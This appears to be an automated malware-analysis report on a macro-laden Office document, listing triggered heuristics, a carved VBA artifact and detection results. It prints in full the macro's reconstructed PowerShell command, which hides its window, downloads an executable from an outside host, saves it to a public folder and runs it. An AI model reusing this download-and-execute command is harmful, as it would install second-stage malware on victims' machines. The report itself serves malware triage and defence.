Malware Insights
The Document_Open VBA macro is configured to execute automatically when the document is opened. It constructs a command line that downloads a second-stage executable from 'https://secure04sd.my03.com/a/oleApp13.exe' and saves it as 'C:\Users\Public\Documents\happyalmost.exe'. The macro then attempts to execute this downloaded file. The reconstructed command line is: 'powershell -w hi sleep -Se 31;Start-BitsTransfer -Source https://secure04sd.my03.com/a/oleApp13.exe -Destination C:\Users\Public\Documents\happyalmost.exe;C:\Users\Public\Documents\happyalmost.exe'.
Heuristics 6
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.basbe023384e2aa1b76d9f2332715feb4a0cb098f2026e51ff24b8d8d507d67d58e |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 861 bytes |
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved macro source contains an auto-exec entry point and execution/download terms.
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.